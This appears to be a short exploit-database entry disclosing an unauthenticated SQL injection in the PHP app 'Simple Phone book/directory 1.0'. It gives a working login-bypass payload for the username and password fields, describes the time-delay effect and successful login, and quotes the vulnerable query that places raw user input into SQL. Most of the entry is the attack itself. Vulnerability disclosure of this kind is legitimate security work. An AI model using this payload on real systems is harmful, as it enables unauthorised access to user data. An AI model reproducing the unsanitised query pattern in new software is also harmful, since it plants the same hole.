# Exploit Title: Simple Phone book/directory 1.0 - 'Username' SQL Injection (Unauthenticated)# Date: 21/08/2021# Exploit Author: Justin White# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/13011/phone-bookphone-directory.html# Version: 1.0# Testeted on: Linux (Ubuntu 20.04) using LAMPP## SQL Injection# Vulnerable page
http://localhost/PhoneBook/index.php
# Vulnerable paramater
username1 & password
# POC
Username =' or sleep(5)='---
Password =' '
Using these to login will have the webapp sleep for5 seconds, then you will be logged inas"' or sleep(5)='-- -"# Vulnerable Code
index.php line 13
$sql = mysqli_query($dbcon,"SELECT * FROM userdetails WHERE username = '$username' AND password = '$password'");
